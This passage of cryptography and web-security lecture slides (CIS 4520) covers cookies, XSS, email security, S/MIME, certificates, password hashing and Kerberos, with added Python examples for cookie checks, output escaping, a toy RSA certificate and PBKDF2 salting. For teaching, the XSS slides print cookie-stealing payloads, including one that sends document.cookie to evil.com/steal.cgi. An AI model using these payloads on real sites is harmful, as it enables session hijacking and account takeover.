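    """Split a Set-Cookie header into (name, value, attributes); attribute
    names are lower-cased and valueless flags such as Secure become True."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def cookie_findings(header, site_host, now=NOW, max_days=30):
    """Check a session cookie against the attributes the slide lists.
    Returns a list of findings; an empty list means the cookie is acceptable."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if attrs.get("secure") is not True:
        findings.append(f"{name}: no Secure, so it is also sent over plain HTTP")
    if attrs.get("httponly") is not True:
        findings.append(f"{name}: no HttpOnly, so scripts can read it via document.cookie")
    domain = attrs.get("domain")
    if isinstance(domain, str) and domain.lstrip(".").lower() != site_host.lower():
        findings.append(f"{name}: Domain={domain} lets every host under it read "
                        f"the cookie, not only {site_host}")
    expires = attrs.get("expires")
    if isinstance(expires, str):
        when = parsedate_to_datetime(expires)
        if when.tzinfo is None:  # "-0000" style dates parse as naive
            when = when.replace(tzinfo=timezone.utc)
        days = (when - now).days
        if days > max_days:
            findings.append(f"{name}: Expires in {days} days, longer than "
                            f"the {max_days}-day policy")
    return findings


if __name__ == "__main__":
    for header in (WEAK_COOKIE, STRONG_COOKIE):
        print(header)
        for finding in cookie_findings(header, "www.example.com") or ["ok"]:
            print("  -", finding)
```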

Cookies
• Allows users to have a cohesive experience
– User authentication
• Use the fact that the user authenticated correctly in the past to make future authentication quicker
– Personalization
• Recognize the user from a previous visit
– Tracking user preferences
• Follow the user from site to site; learn his/her browsing behaviour, preferences, and so on
• A browser's cookie management window (screenshots)

Cookies
• JavaScript and Cookies…
• James sends this message to Robert:
<script>
alert(document.cookie);
</script>
– <script>: HTML tag used to embed JavaScript code within an HTML document
– alert(): a built-in JavaScript function that creates a pop-up dialog box with the specified message
– document.cookie: returns a string containing all cookies associated with the current document
• If Robert's email client allows execution of JavaScript within emails, then simply opening the email could trigger the script to execute
(screenshot of the resulting dialog)

Cookies
• OK, we can use Javascript to access cookies
• So what?
• James sends this to Robert:
<script>
document.getElementById("to").value="james";
document.getElementById("message").value=document.cookie;
</script>
• This JavaScript code
‒ modifies the values of two HTML elements on the webpage: one with the ID “to” and another with the ID “message”
‒ sets the value of the “to” element to “james” and the value of the “message” element to the entire cookie string
(screenshot)
• OK, we can use Javascript to access cookies and forms
• So what?
• Robert will not send the message…

Cookies
• James sends this to Robert:
<script>
document.getElementById("to").value="james";
document.getElementById("message").value=document.cookie;
document.forms["msg"].submit();
</script>
(screenshot)
• James gets Robert’s cookies

Application Security
• Web Security
– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spamming

XSS Attacks
(figure) The victim’s browser sends GET /hello.cgi?name=Alice to naive.com; hello.cgi is executed and returns:
<HTML>Hello, dear Alice Welcome!</HTML>

XSS Attacks: Cookie Theft
(figure) The victim’s browser accesses some web page on evil.com, which returns a frame that forces the victim’s browser to call hello.cgi on naive.com with a script as “name”:
<FRAME SRC=http://naive.com/hello.cgi?name=<script>win.open(“http://evil.com/steal.cgi?cookie=”+document.cookie)</script>>
The victim’s browser then sends to naive.com:
GET /hello.cgi?name=<script>win.open(“http://evil.com/steal.cgi?cookie=”+document.cookie)</script>
hello.cgi is executed and naive.com returns:
<HTML>Hello, dear <script>win.open(“http://evil.com/steal.cgi?cookie=”+document.cookie)</script> Welcome!</HTML>
This is interpreted as Javascript by the victim’s browser; it opens a window and calls steal.cgi on evil.com:
GET /steal.cgi?cookie=

XSS Attacks
• Attacker inserts malicious JavaScript into a Web page or HTML email
• When the script is executed, it steals the user’s cookies and hands them over to the attacker’s site
• Problem occurs when sites fail to sanitize user input to strip HTML, so user input is inserted/injected into the HTML response
– strip HTML: to remove or filter out HTML code from user input before it is inserted into a webpage
– input sanitization: the process of cleaning and validating user input to ensure that it is safe and conforms to the expected format before using it in an application

XSS Attacks
• Why is the victim’s cookie returned?
– Javascript from a site can access that site’s cookies
– If the Javascript contains malicious code, it can steal cookies and send them to some other site
• Why would the user click on such a link?
– Phishing email in webmail client (e.g. gmail).
– Embed link in double-click banner Ad
– Many ways to fool the user into clicking, social engineering
• What if evil.com gets the cookie for the victim?
– Cookie may include session authentication for the victim and data intended only for the victim
– Attacker gains unauthorized access to the victim's session on naive.com, potentially leading to account takeover or other privacy violations

XSS Attacks
• Attacker can execute arbitrary scripts in the browser
– To attack other websites
• Can manipulate any DOM component on victim.com
– Control links on page
– Control form fields on this page and linked pages
• Example: MySpace.com phishing attack injects a password field that sends the password to the bad guy
– DOM: Document Object Model
• Data representation of objects that comprise the structure and content of a webpage

Cybersecurity Incident: MySpace Worm
• MySpace.com: social networking website founded in 2003 in the U.S.
• Users can post HTML on their MySpace pages
• MySpace does not allow scripts in users’ HTML
– No <script>, <body>, onclick, <a href=javascript://>
• … but it does allow Javascript in CSS (Cascading Style Sheets) tags
– <div style=“background:url(‘javascript:alert(1)’)”>
• With careful Javascript hacking
– Samy’s worm: propagates itself through MySpace, infects anyone who visits an infected MySpace page, and adds Samy as a friend.
– 5 hours later, Samy has 1,005,831 friends (1000/s).
– Samy had millions of friends within 24 hours.

Preventing Cross-Site Scripting
• Preventing injection of scripts into HTML is hard!
• Input checking is difficult
– Blocking “<” and “>” is not enough (“<” and “>” are used to create malicious payloads that execute JavaScript, leading to XSS attacks when interpreted by the browser)
– Many ways to inject: event handlers, stylesheets, encoded inputs (%3C, URL encoded form of “<”)
• Preprocess input from user before displaying it on a web page
– In PHP: htmlspecialchars(string) is used to replace all special characters with their HTML codes
– In ASP.NET, Server.HtmlEncode(string) is used
(callout) Ensure that special characters are displayed on the page as normal text rather than being interpreted as part of the HTML or script code.
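The output-encoding control from this slide as an added example (not the lecture's code) in Python, where html.escape() stands in for PHP's htmlspecialchars(): a naive “drop < and >” filter is rendered beside proper encoding for both a text context and an attribute context, using the lecture's document.cookie script, its URL-encoded form (%3C) and an event-handler break-out that needs neither character. The page template, the field names and the filter-then-decode ordering are constructed.

```python
import html
import re
from urllib.parse import unquote

# Constructed page template with one element-text slot and one attribute slot.
PAGE = '<p class="comment">{body}</p>\n<input name="reply" value="{reply}">'

# Constructed inputs: the lecture's cookie-dialog script, the same script with
# '<' and '>' URL-encoded (%3C / %3E), and an attribute break-out that adds an
# event handler without using either character.
SCRIPT_INPUT = "<script>alert(document.cookie);</script>"
ENCODED_INPUT = "%3Cscript%3Ealert(document.cookie);%3C/script%3E"
ATTRIBUTE_INPUT = '" onfocus="alert(1)'


def render_naive(body, reply):
    """The weak control: delete '<' and '>' from the raw input, then (as many
    applications do; the order is assumed here) URL-decode just before display."""
    def strip(s):
        return s.replace("<", "").replace(">", "")
    return PAGE.format(body=unquote(strip(body)), reply=unquote(strip(reply)))


def render_escaped(body, reply):
    """htmlspecialchars-style control: decode first, then at output time encode
    & < > " ' so the browser shows them as plain text in either context."""
    def enc(s):
        return html.escape(unquote(s), quote=True)
    return PAGE.format(body=enc(body), reply=enc(reply))


# A tag, or an inline event handler followed by a real quote, reached the page.
_LIVE_MARKUP = re.compile(r'<script|\son\w+="', re.IGNORECASE)


def markup_survived(rendered):
    """True when user input became executable markup instead of visible text."""
    return _LIVE_MARKUP.search(rendered) is not None


if __name__ == "__main__":
    for label, page in (("naive", render_naive(ENCODED_INPUT, ATTRIBUTE_INPUT)),
                        ("escaped", render_escaped(ENCODED_INPUT, ATTRIBUTE_INPUT))):
        print(f"--- {label}: markup survived = {markup_survived(page)}")
        print(page)
```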

Application Security
• Web Security
– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spamming

Internet Mail Architecture
(figure) Simple Mail Transfer Protocol (SMTP)

Email Security
• Threats to the security of e-mail itself
– Loss of confidentiality
• E-mails are sent in clear over open networks
• E-mails stored on potentially insecure clients and mail servers
– Loss of integrity
• No integrity protection on e-mails; body can be altered in transit or on mail server
– Lack of data origin authentication
– Lack of non-repudiation
– Lack of notification of receipt

What are the Options
• Secure the server to client connections (easy thing first)
– POP, IMAP over SSH, SSL
– HTTPS access to webmail
– Very easy to configure
– Protection against insecure wireless access
• Secure the end-to-end email delivery

Email based Attacks
• Active content attack
– Clean up at the server
• Buffer over-flow attack
– Fix the code
• Shell script attack
– Scan before sending to the shell
• Trojan Horse Attack
– Use the “do not automatically use the macro” option

Email based Attacks
• Web bugs (tiny, hidden images embedded in emails to track when an email is opened)
– Modifying the image at the mail server maintains visual consistency while disabling tracking
– Disable image auto-loading to prevent tracking

Application Security
• Web Security
– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spamming

Email SPAM
• Global cost of spam exceeded 17 billion U.S. dollars in 2020 (Source: Statista)
– includes direct costs such as lost productivity, costs associated with anti-spam solutions, potential legal compliance costs, etc.
• SPAM filtering
– Content based – required hits
– White list, Black list
– Defang MIME (Multipurpose Internet Mail Extensions)
• altering email content so that potentially malicious elements within the email cannot be executed, such as disabling links or scripts contained within the email.

S/MIME
• Secure/Multipurpose Internet Mail Extensions
• Security enhancement to MIME email
– original Internet RFC822 email was text only
– MIME provided support for varying content types and multi-part messages, e.g., attachments
– with encoding of binary data to textual form
– industry standard for public key encryption and signing of MIME data
• S/MIME supported in many mail agents
– e.g., MS Outlook, Mozilla, Mac Mail etc.

S/MIME Functions
• enveloped data
– encrypted content and associated keys
• signed data
– encoded message + signed digest
– integrity and authenticity of a message
• clear-signed data
– cleartext message + encoded signed digest
– integrity and authenticity of a message
• signed & enveloped data
– nesting of signed & encrypted entities
– confidentiality, integrity, and authenticity
(callout on “encoded”) The original message is transformed into a different format for data integrity or transmission compatibility, e.g., Base64, URL, or HTML entity encoding.

S/MIME Cryptographic Algorithms
• digital signatures: DSS & RSA
• hash functions: SHA-1 & MD5
• session key encryption: ElGamal & RSA
• message encryption: AES, Triple-DES, RC2/40 and others
• MAC: HMAC with SHA-1
• have process to decide which algs to use

S/MIME Certificate Processing
• S/MIME uses X.509 v3 certificates
• managed using a hybrid of a strict X.509 CA hierarchy & PGP’s web of trust
• each client has a list of trusted CA’s certs
• and own public/private key pairs & certs
• certificates must be signed by trusted CA’s

Conclusions
• The Internet works only because we implicitly trust one another
• It is very easy to exploit this trust
• The same holds true for software
• It is important to stay on top of the latest security advisories to know how to patch any security holes

Security Advisories
• Canadian Centre for Cyber Security
– Government of Canada
– https://www.cyber.gc.ca/en/alerts-advisories
• Cybersecurity and Infrastructure Security Agency
– U.S. Department of Homeland Security
– https://www.cisa.gov/news-events/cybersecurity-advisories

Security Related URLs
• OWASP (Open Web Application Security Project)
– https://owasp.org/
• SANS Institute
– https://www.sans.org/CERT
• CERT (Computer Emergency Response Team)
– https://www.cisa.gov/
• The Hacker News
– https://thehackernews.com/
• SecurityWeek
– https://www.securityweek.com/

Slides References
• Purdue University CS 555
• North Carolina School of Science and Mathematics Cryptography

CIS 4520 Introduction to Cryptography
Authentication
Wenjing Zhang
[email protected]

Authentication
• Authentication: proves you are who you say you are (confirms identity)
• Authentication
– Alice connects to chase.com
• How does Alice know it’s really Chase?
– Alice logs in to use the system
• How does the system know it’s Alice?
• We consider two authentication scenarios
– Server authentication
• Certificate
– User authentication
• With OS
• In a distributed system
CIS 4520
Introduction to
Cryptography
Server Authentication Using Certificate
Wenjing Zhang 1. User Action: User enters https://www.cibc.com
in a web browser.
2. Certificate Presentation: The server sends its
digital certificate.
3. Browser Verification: Verifies the digital
signature with the CA's public key.
4. Session Key Encryption: Browser encrypts a
session key using the server's public key.
5. Server Decryption: Server decrypts the session
key using its private key.
6. Secure Session: Browser and server exchange
data encrypted with the session key.

3
CIS 4520
Introduction to
Cryptography
User Authentication
Wenjing Zhang • Operating System (OS) Authentication
– Local Login (e.g., Windows 10):
• Credentials checked against OS security database.
– Access Control:
• Once authenticated, permissions determine access to
files, apps, and settings.
• Distributed System Authentication
– Single Sign-On (e.g., UofG Account):
• One-time login grants access to multiple services
(e.g., email, internal applications such as
webadvisor).
– Multi-Factor Authentication (e.g., IRCC):
• Adds layers of security with additional verification
(e.g., one-time passcode, biometrics).
4
Certificate
• Bob gets a message claiming to be from Alice
  – Message is signed with a key claiming to be Alice’s
  – Signature matches the message
  – That is
    • the message m was hashed into h(m), and then encrypted by a private key into c = E(h(m))
    • together with the message m and the encrypted hash c, Bob also receives a public key that claims to belong to Alice
    • the public key could successfully decrypt c into D(c)
    • Bob hashes the message locally, and it does match D(c)
  – Is Bob sure that it came from Alice?
  – How could Bob confirm that the public key belongs to Alice?

Certificate
• Related question. Can I:
  – Take a small picture of myself
  – Attach it to a card saying that I’m Joe Biden
  – Get a free ride on Air Force One?

Certificate
• I tell you my real name
  – How can you verify?
  – I can show you my Driver’s License
    • I also have a card saying that I’m Biden
  – Why do you trust a driver's license but not the ID card that I created saying I’m Biden?
  – The United States of America vouches that the picture matches the name, address, etc. of the info on the card
  – If you trust the United States of America, you believe the info on the license

Certificate
• Can we do the same for public keys?
• When we use https://citi.com/, how do we know if it’s really Citi Bank?
  – You trust this is Citi, if you trust DigiCert

Certificate (the citi.com certificate chain as displayed by the browser)
• Citi is endorsed by DigiCert SHA2 Extended Validation Server CA, which is further endorsed by DigiCert High Assurance EV Root CA
• Fields shown in the certificate:
  – The identity of the owner of the website.
  – The identity of the entity who issued the certificate, i.e., the Certificate Authority.
  – The end-user certificates expire in a year or so.
  – RSA is used in this certificate. Key length: 2048 bits. Exponent: e. Modulus: n.
  – The crypto hash values (fingerprints).
• Now we look at DigiCert SHA2 Extended Validation Server CA: this certificate is valid for 15 years.
• Now we look at the root certificate: the root certificate is valid for 25 years.
Public-Key Infrastructure (PKI)
• Goal of authentication: bind identity to key
• Public key: bind identity to public key
  – Alice’s identity and Alice’s public key
  – Crucial, as people will use the key to communicate with the principal whose identity is bound to the key
  – Erroneous binding means no secrecy between principals
  – Assume the principal is identified by an acceptable name

Public-Key Infrastructure (PKI)
• RFC 4949 (Internet Security Glossary) defines public-key infrastructure (PKI) as the set of hardware, software, people, policies, and procedures needed to create, manage, store, distribute, and revoke digital certificates based on asymmetric cryptography.
• The principal objective for developing a PKI is to enable secure, convenient, and efficient acquisition of public keys.

Public-Key Infrastructure (PKI)
• Certificate: token (message) containing
  – Identity of principal (here, Alice)
  – Corresponding public key
  – Timestamp (when issued)
  – Other information (perhaps identity of signer)
  – Hash (message digest) of token
• Hash encrypted by trusted authority (here, Cathy) using her private key: called a “signature”

  CA = eA || Alice || T || {h(eA || Alice || T)} dC

Public-Key Infrastructure (PKI)
• Alice’s certificate: CA = eA || Alice || T || {h(eA || Alice || T)} dC
• Bob gets Alice’s certificate
  – If he knows Cathy’s public key, he can validate the certificate
    • Decrypt the encrypted hash using Cathy’s public key
    • Re-compute the hash from the certificate and compare
    • Check validity
    • Is the principal Alice?
  – Now Bob has Alice’s public key
    • Alice is endorsed by Cathy!

Public-Key Infrastructure (PKI)
• Alice’s certificate: CA = eA || Alice || T || {h(eA || Alice || T)} dC
• Problem: Bob needs Cathy’s public key to validate the certificate
  – That is, secure distribution of public keys
  – Solution: Public Key Infrastructure (PKI) using trust anchors called Certificate Authorities (CAs) that issue certificates

Public-Key Infrastructure (PKI)
• Hierarchical CAs with cross-certification
  – Multiple root CAs that are cross-certified
• Web Model
  – Browsers or Operating Systems come pre-configured with multiple trust anchor certificates
  – New certificates can be added (be careful!)
  – Bad certificates can be revoked.
• Distributed model (e.g., PGP)
  – No CA; instead, users certify each other to build a “web of trust”
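The certificate and Bob's validation steps above, worked through in code. This is an added example, not from the slides: Cathy issues CA = eA || Alice || T || {h(eA || Alice || T)} dC and Bob checks it against his trust anchors. The RSA keys are built from Mersenne primes to keep the numbers readable (a teaching toy without padding, not a production scheme), and the token layout, the lifetime field and the names of the helpers are choices made for this example.

```python
"""Added example, not from the slides: Alice's certificate in the slides' notation,
    CA = eA || Alice || T || {h(eA || Alice || T)} dC,
issued by Cathy and checked by Bob against his list of trust anchors. Signatures use
textbook RSA (no padding) over Mersenne primes so the numbers stay small: a teaching
toy with a ~92-bit modulus, not a production signature scheme. Names, the token
layout and the lifetime field are choices made for this example."""
import hashlib
from dataclasses import dataclass, replace
from typing import Dict, Optional, Tuple

PublicKey = Tuple[int, int]   # (e, n)
PrivateKey = Tuple[int, int]  # (d, n)


def rsa_keypair(p: int, q: int, e: int = 65537) -> Tuple[PublicKey, PrivateKey]:
    n, phi = p * q, (p - 1) * (q - 1)
    return (e, n), (pow(e, -1, phi), n)


def h(token: bytes) -> int:
    """Message digest of the token, read as an integer."""
    return int.from_bytes(hashlib.sha256(token).digest(), "big")


@dataclass(frozen=True)
class Certificate:
    subject: str            # Alice
    public_key: PublicKey   # eA (with its modulus nA)
    issued: int             # T, as a Unix timestamp
    lifetime: int           # seconds the certificate stays valid
    issuer: str             # Cathy, so Bob knows which trust anchor applies
    signature: int          # {h(token)} dC

    def token(self) -> bytes:
        """eA || Alice || T, plus the other information the slides allow."""
        e, n = self.public_key
        return f"{e}:{n}|{self.subject}|{self.issued}|{self.lifetime}|{self.issuer}".encode()


def issue_certificate(issuer: str, issuer_priv: PrivateKey, subject: str,
                      subject_pub: PublicKey, issued: int, lifetime: int) -> Certificate:
    """Cathy hashes the token and 'encrypts' the hash with her private key dC.
    The hash is reduced mod n because the toy modulus is shorter than SHA-256."""
    cert = Certificate(subject, subject_pub, issued, lifetime, issuer, signature=0)
    d, n = issuer_priv
    return replace(cert, signature=pow(h(cert.token()) % n, d, n))


def validate(cert: Certificate, trust_anchors: Dict[str, PublicKey],
             now: int) -> Optional[PublicKey]:
    """Bob's checks from the slides: decrypt the hash with Cathy's public key,
    recompute the hash from the certificate and compare, check validity.
    Returns the subject's public key when everything holds, otherwise None."""
    anchor = trust_anchors.get(cert.issuer)
    if anchor is None:
        return None          # Bob has no public key for this issuer: cannot validate
    e, n = anchor
    if pow(cert.signature, e, n) != h(cert.token()) % n:
        return None          # token altered, or not signed with the issuer's private key
    if not cert.issued <= now < cert.issued + cert.lifetime:
        return None          # outside the validity period
    return cert.public_key


# Constructed keys: Cathy uses the Mersenne primes 2^31-1 and 2^61-1, Alice 2^89-1 and 2^107-1.
CATHY_PUB, CATHY_PRIV = rsa_keypair((1 << 31) - 1, (1 << 61) - 1)
ALICE_PUB, _ALICE_PRIV = rsa_keypair((1 << 89) - 1, (1 << 107) - 1)

if __name__ == "__main__":
    issued_at = 1_700_000_000                                   # constructed timestamp T
    cert = issue_certificate("Cathy", CATHY_PRIV, "Alice", ALICE_PUB, issued_at, 365 * 86400)
    bob_trusts = {"Cathy": CATHY_PUB}                          # Bob's list of trusted CAs
    print("genuine certificate ->", validate(cert, bob_trusts, issued_at + 60) == ALICE_PUB)
    forged = replace(cert, public_key=(65537, 12345))          # a swapped-in public key
    print("tampered certificate ->", validate(forged, bob_trusts, issued_at + 60))
    print("unknown issuer ->", validate(cert, {}, issued_at + 60))
```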
Authentication
• Authentication: proves you are who you say you are (confirms identity)
• Authentication
  – Alice talks with Bob
    • How does Bob know it’s Alice?
  – Alice logs in to use the system
    • How does the system know it’s Alice?
• We consider two authentication scenarios
  – Server authentication
    • Certificate
  – User authentication
    • With OS
    • In a distributed system

Authentication
• Credentials can be
  – Something I am (e.g., fingerprint)
  – Something I have (e.g., security token)
  – Something I know (e.g., password)
• Passwords
  – Used to authenticate users in OS, web, email, etc.
Password Authentication
• Passwords are pretty weak……
• SplashData’s Worst Passwords List: most commonly used passwords in 2015 (from 2M+ leaked passwords) [list shown as a figure]
• SplashData’s Worst Passwords List: most commonly used passwords in 2018
  Rank  Password   Change from 2017
  1     123456     Unchanged
  2     password   Unchanged
  3     123456789  Up 3
  4     12345678   Down 1
  5     12345      Unchanged
  6     111111     New
  7     1234567    Up 1
  8     sunshine   New
  9     qwerty     Down 5
  10    iloveyou   Unchanged
  11    princess   New
  12    admin      Down 1
  13    welcome    Down 1
  14    666666     New
  15    abc123     Unchanged
  16    football   Down 7
  17    123123     Unchanged
  18    monkey     Down 5
  19    654321     New
  20    !@#$%^&*   New
  21    charlie    New
  22    aa123456   New
  23    donald     New
  24    password1  New
  25    qwerty123  New

Password Authentication
• What if the bad guy gets your password file?
  – Aside: this has happened a lot. Many of them through SQL injection attacks.
• Instead of storing cleartext passwords
  – Store passwords transformed through some one-way function, e.g. the hash of the password.
• When the user sends a password
  – System takes the hash of the password, H(pass)
  – Check H(pass) == what’s in the password file

Password Authentication
• Password crackers
  – Brute force
  – Dictionary based
• What if the bad guy manages to get the hashed password h(p)?
  – Hash the terms in the dictionary, and compare them with h(p)
  – Countermeasure: we can make the h() function very slow, or hash it many times.
    • If it takes 0.1 second to compute the hash – doesn’t matter in real-world applications.
    • However, the adversary could only test 600 passwords in a minute.

Password Authentication
• What if the bad guy pre-computes h(p) for all entries in the dictionary?
  – Rainbow table: contains pre-computed hashes for a large number of possible passwords.
  – Yes, you can purchase them from the Internet.
  [figure: a rainbow table listing for NTLM hashes; NTLM is MS’s NT LAN Manager]
• Countermeasure: salt
  – Add randomness to the password hash
  – Random data called salt
  – Example: Cryptographically Secure Pseudo-Random Number Generator (CSPRNG)

Password Authentication
• Future of password authentication
  – Graphical passwords?
    • Android: patterns
  – Biometrics?
    • uses unique physical characteristics for identification
    • Face recognition
    • Fingerprint
  – Two-factor authentication? (Knowledge Factor + Possession Factor)
    • password + token
    • password + something like SecurID
    • password + biometrics
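The two countermeasures from the slides (a slow, iterated hash and a random salt) as they look in a password file, together with the dictionary cracker they defend against. This is an added example, not from the slides: it uses PBKDF2-HMAC-SHA256 from Python's standard library, and the record layout, iteration count and function names are choices made for this example.

```python
"""Added example, not from the slides: storing passwords as salted, slow hashes with
PBKDF2-HMAC-SHA256 from Python's standard library, and the attacker's side (a dictionary
attack against one stored record) to show what the salt and the iteration count change.
Record layout and the iteration count are choices made for this example."""
import hashlib
import hmac
import os
from typing import List, Optional, Tuple

Record = Tuple[bytes, int, bytes]   # (salt, iterations, hash): what the password file holds
ITERATIONS = 100_000                # "hash it many times": slow for the attacker, fine for a login


def hash_password(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """One-way transform H(salt, pass), iterated to make each guess expensive."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def make_record(password: str) -> Record:
    """Store (salt, iterations, hash) instead of the cleartext password.
    The salt comes from the OS CSPRNG, so two users with the same password
    get different hashes and a table precomputed without the salt is useless."""
    salt = os.urandom(16)
    return salt, ITERATIONS, hash_password(password, salt)


def verify_password(record: Record, candidate: str) -> bool:
    """Login check: recompute H(pass) with the stored salt, compare in constant time."""
    salt, iterations, stored = record
    return hmac.compare_digest(stored, hash_password(candidate, salt, iterations))


def dictionary_attack(record: Record, dictionary: List[str]) -> Optional[str]:
    """The dictionary cracker from the slides, run against a salted record: every guess
    must be re-hashed with this record's salt at the full iteration cost, so the work is
    len(dictionary) * iterations per stolen record, with nothing to precompute."""
    salt, iterations, stored = record
    for guess in dictionary:
        if hash_password(guess, salt, iterations) == stored:
            return guess
    return None


if __name__ == "__main__":
    # Constructed sample: a user who chose a password from the 2018 worst-passwords list.
    record = make_record("sunshine")
    print("correct password accepted:", verify_password(record, "sunshine"))
    print("wrong password rejected:", not verify_password(record, "Sunshine"))
    print("same password, different hash:", make_record("sunshine")[2] != record[2])
    print("dictionary hit:", dictionary_attack(record, ["123456", "password", "sunshine"]))
```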
Distributed Authentication
• In a distributed environment?
  – Key management
  – Secret key: if there are N entities, N² shared keys would be needed
  – PKI: if there are N entities, N (public, private) key pairs would be needed
  – A better solution?

What is Kerberos?
• Computer-network authentication protocol
  – one of the best-known and most widely implemented trusted third-party key distribution systems
  – developed at MIT in the mid-1980s
• Provides strong authentication for client/server applications in a distributed environment, using secret-key cryptography.
  – the user types in a password and is logged into a workstation. On behalf of the user, the workstation authenticates and accesses resources seamlessly
  – allows users access to services distributed through the network
  – without needing to trust all workstations
  – rather, all trust a central authentication server
• Two versions in use: 4 & 5

What is Kerberos?
• Cerberus (Kerberos in Greek)
  – In Greek mythology, a many-headed dog, the guardian of the entrance of Hades
• Practical Uses of Kerberos
  – Microsoft Windows
  – Email, FTP, network file systems, many other applications have been kerberized
    • Use of Kerberos is transparent for the end user
    • Transparency is important for usability!
  – Local authentication
    • login and su in OpenBSD
  – Authentication for network protocols
    • rlogin, rsh
  – Secure windowing systems: graphical user interface (GUI) environments designed with security features

Design Rationales Behind Kerberos
• To reduce the amount of information each individual system needs to maintain.
• Less work on servers (KDC and Bob), more work on clients
  – A client requests credentials (ticket + session key) and manages them; KDC and Bob do not keep a record of user credentials but only verify them (except authenticators, which are kept to avoid replay attacks)
  – More scalable in a large distributed system
• Less communication overhead
  – Tickets' time-limited, multi-time-use nature within their validity period reduces authentication-related messages.

Many-to-Many Authentication [figure]

Requirements for Distributed Authentication
• Security
  – … against attacks by passive eavesdroppers and actively malicious users
• Transparency (user-friendly)
  – Users shouldn’t notice authentication taking place
  – Entering a password is OK, if done rarely
• Scalability
  – Large number of users and servers

Threats
• User impersonation
  – Malicious user with access to a workstation pretends to be another user from the same workstation
• Network address impersonation
  – Malicious user changes the network address of his workstation to impersonate another workstation
• Eavesdropping, tampering, replay
  – Malicious user eavesdrops on, tampers with, or replays other users’ conversations to gain unauthorized access

Terms
• Password
  – Static knowledge to verify a user's identity.
• Token
  – A physical device or software used to generate one-time codes (e.g. PIN).
• Ticket
  – A time-limited electronic credential (block of data) issued by an authentication system, allowing a user to access a service during a particular session, encrypted with a secret key.
• Authenticator
  – One-time-use encrypted data structure created by the client, proof of identity.

Solution: Trusted Third Party [figure]

Naive Authentication [figure]

Two-Step Authentication? [figure]

Threats
• Ticket hijacking
  – Malicious user may steal the service ticket of another user on the same workstation and use it
  – Servers must verify that the user who is presenting the ticket is the same user to whom the ticket was issued
• No server authentication
  – Attacker may misconfigure the network so that he receives messages addressed to a legitimate server
    • Capture private information from users and/or deny service
  – Servers must prove their identity to users

Overview of Kerberos [figure]

Symmetric Keys in Kerberos [figure]

Phase 1: “Single Logon” Authentication [figure]

Phase 2: Obtaining a Service Ticket [figure]

Phase 3: Obtaining Service [figure]

Ticket vs. Authenticator
• Ticket
  – similar to a "passport" issued by the TGS that grants the user time-limited permission to access a service and contains the necessary details to establish a secure session.
• Authenticator
  – a one-time-use proof of identity that shows the user is currently active and is the one presenting the ticket to the service.

Summary of Kerberos Negotiations [figure; source: Wikipedia]

Kerberos in Large Networks
• One KDC isn’t enough for large networks
• Network is divided into realms
  – KDCs in different realms have different key databases
• To access a service in another realm, users must…
  – Get a ticket for the home-realm TGS from the home-realm KDC
  – Get a ticket for the remote-realm TGS from the home-realm TGS
    • As if the remote-realm TGS were just another network service
  – Get a ticket for the remote service from that realm’s TGS
  – Use the remote-realm ticket to access the service
  – N(N−1)/2 key exchanges for full N-realm interoperation

Important Ideas in Kerberos
• Short-term session keys
  – Long-term secrets used only to derive short-term keys
  – Separate session key for each user-server pair
    • Re-used by multiple sessions between the same user and server
• Proofs of identity based on authenticators
  – Client encrypts his identity, addr, time with the session key; knowledge of the key proves the client has authenticated to the KDC
    • Also prevents replays (if clocks are globally synchronized)
  – Server learns this key separately (via an encrypted ticket that the client can’t decrypt), verifies the client’s authenticator
• Symmetric cryptography only

Kerberos Version 5
• Better user-server authentication
  – Separate subkey for each user-server session instead of re-using the session key contained in the ticket
  – Authentication via subkeys, not timestamp increments
• Authentication forwarding (delegation)
  – Servers can access other servers on the user’s behalf, e.g. can tell the printer to fetch email
• Realm hierarchies for inter-realm authentication
• Explicit integrity checking + standard CBC mode
• Multiple encryption schemes, not just DES

Kerberos V4 vs. V5
• Authentication forwarding/delegation: V4 does not allow it, V5 allows it
• Inter-realm authentication: no chaining in V4 (N realms require O(N²) Kerberos-to-Kerberos relationships); V5 supports a KDC hierarchy
• Session keys: negotiation of sub-session keys is supported in V5 for different sessions of the same service type
• Privacy + integrity: V4 uses PCBC; V5 uses explicit integrity mechanisms (e.g., hash) with CBC encryption

Summary
• Symmetric key problem: How do two entities establish a shared secret key over the network?
  – Solution: trusted key distribution center (KDC) acting as intermediary between entities
• Public key problem: When Alice obtains Bob’s public key (from a web site, e-mail, diskette), how does she know it is Bob’s public key, not Trudy’s?
  – Solution: trusted certification authority (CA)

Symmetric Key Distribution with KDC
• Typically used within private or internal networks
• Corporate Security:
  – Enterprise Wi-Fi Security: WPA-Enterprise encryption for Wi-Fi where the KDC part of RADIUS servers authenticates users.
  – Single Sign-On (SSO) Systems: Centralized authentication services allowing users to log in once and access multiple applications securely.
• Telecommunications:
  – 4G/5G Networks: Mobile networks use KDCs to manage encryption keys for securing communication between cell phones and network towers.
  – VoIP Services: Encrypted voice communication services such as Skype for Business where KDCs facilitate secure key exchange for sessions.
• Streaming:
  – Media Streaming Services: Platforms like Netflix use session keys for DRM protection, often distributed by a KDC-like system.
• Financial Services:
  – ATM Transactions: Banks use KDCs to authenticate and secure communications between ATMs and their network.

Public Key Infrastructure with CA
• Typically used on the public internet
• Online Banking: Websites use SSL/TLS certificates from CAs for secure customer transactions.
• Software Updates: Microsoft, Apple, and others use CA-signed certificates for authenticating updates.
• Email Encryption: Outlook and other email clients utilize S/MIME with CA verification for secure communication.
• Document Signing: Adobe Acrobat allows CA-verified digital signatures on PDFs.
• Mobile App Stores: App Store and Google Play use CA-signed certificates to verify app integrity.
• SSH for Servers: System administrators use CA-signed SSH keys for secure server access.

Summary
• The basic mechanisms of Trusted Third Parties for distributed authentication using different crypto methods
  – Symmetric key: KDC (Key Distribution Center, the key concept of ticket)
  – Asymmetric key: CA (Certification Authority, the heart of the X.509 standard)
• The practical protocols of distributed authentication
  – Symmetric key: Kerberos
